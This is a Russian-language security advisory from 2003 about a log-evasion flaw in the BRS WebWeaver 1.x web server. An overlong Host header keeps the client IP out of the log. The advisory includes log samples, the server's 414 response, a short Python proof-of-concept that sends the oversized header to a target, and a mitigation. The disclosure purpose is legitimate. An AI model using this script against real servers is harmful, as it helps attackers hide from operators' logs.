Дата публикации: | 29.09.2003 |
Всего просмотров: | 1196 |
Опасность: | Низкая |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | Удаленная |
Воздействие: | Спуфинг атака |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | BRS WebWeaver 1.x |
Уязвимые версии: BRS WebWeaver 1.x
Описание: Уязвимость обнаружена в BRS WebWeaver. Удаленный атакующий может выполнить HTTP запрос, в котором не будет зарегистрирован IP адрес. WebWeaver 1.06 и, вероятно, предыдущие версии, позволяет `анонимный серфинг' при помощи некоторого трюка. Если HTTP `Host' заголовок в HTTP запросе к серверу будет лишком длинным, то Webweaver не запишет ваш адрес IP в лог-файл: HTTP Server Started - 24/Sep/2003:18:13:39 10.0.0.6 - - [24/Sep/2003:18:15:01] "GET / HTTP/1.1" 304 "-" "-" 10.0.0.6 - - [24/Sep/2003:18:15:03] "GET / HTTP/1.1" 304 "-" "-" - - [24/Sep/2003:18:15:14] "GET / HTTP/1.1" 414 "-" "-" - - [24/Sep/2003:18:16:01] "GET / HTTP/1.1" 414 "-" "-" - - [24/Sep/2003:18:16:11] "GET / HTTP/1.1" 414 "-" "-"Ответ сервера HTTP: HTTP/1.0 414 Request-URI Too Large Sever: BRS WebWeaver/1.06 Date: Wed, 24 Sep 2003 14:16:11 GMT Content-Type: text/html <HTML><HEAD><TITLE>414 Request-URI Too Large</TITLE></HEAD><BODY><H1>414 Request -URI Too Large</H1>The requested URL's length exceeds the capacity limit for thi s server.</BODY></HTML> Пример/Эксплоит: #! /usr/bin/env python ## # by euronymous [ http://f0kp.iplus.ru ] # # Usage: ./WWanon.py <target_host> ## import sys, socket H0ST = sys.argv[1] BUF = 'fp' * 0x815F f = socket.socket(socket.AF_INET, socket.SOCK_STREAM) f.connect((H0ST,80)) f.send('GET / HTTP/1.1\r\n') f.send('Host: '+BUF+'\n\n') WWout = f.recv(1024) f.close() print WWout URL производителя:http://www.brswebweaver.com/ Решение:Регистрируйте запросы другими способами (firewall, IDS) |
|
Ссылки: | BRS WebWeaver: Анонимный серфинг |